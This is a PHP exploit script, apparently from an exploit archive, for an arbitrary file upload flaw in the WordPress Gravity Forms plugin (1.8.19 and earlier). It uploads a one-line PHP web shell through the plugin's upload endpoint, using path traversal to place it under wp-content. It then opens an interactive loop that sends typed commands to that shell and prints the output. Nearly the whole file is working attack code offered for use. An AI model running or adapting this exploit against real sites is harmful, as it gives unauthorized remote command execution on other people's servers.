<?php
# Exploit Title: Wordpress Gravity Forms - Arbitrary File Upload
# Vendor Homepage: http://www.gravityforms.com/
# Vulnerable Version(s): 1.8.19 (and below)
# Exploit Author: Abk Khan
# Contact: [ an0nguy @ protonmail.ch ]
# Website: http://blog.lolwaleet.com/
# Category: webapps
# PS: I just wrote the exploit code by reading this write-up [ goo.gl/816np5 ] -- Don't know who found the vulnerability!
error_reporting(0);
$domain = 'http://localhost/wordpress';
$url = "$domain/?gf_page=upload";
$shell = "$domain/wp-content/_input_3_khan.php5";
$separator = '-----------------------------------------------------';
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, '<?=system($_GET[0]);?>&form_id=1&name=khan.php5&gform_unique_id=../../../../&field_id=3');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
curl_close($ch);
if (eregi('ok', $response)) {
echo "$separator\nShell at $shell\n$separator\n\n";
while ($testCom != 'bubye!') {
$user = trim(get_string_between(file_get_contents("$shell?0=echo%20'~';%20whoami;%20echo%20'~'"), '~', '~'));
echo "$user@b0x:~$ ";
$handle = fopen("php://stdin", 'r');
$testCom = trim(fgets($handle));
fclose($handle);
$comOut = trim(get_string_between(file_get_contents("$shell?0=echo%20'~';%20" . urlencode($testCom) . ";%20echo%20'~'"), '~', '~')) . "\n";
echo $comOut;
}
}
else {
die("$separator\n$domain doesn't seem to be vulnerable! :(\n$separator");
}
function get_string_between($string, $start, $end)
{
# stolen from stackoverflow!
$string = " " . $string;
$ini = strpos($string, $start);
if ($ini == 0)
return "";
$ini += strlen($start);
$len = strpos($string, $end, $ini) - $ini;
return substr($string, $ini, $len);
}
?>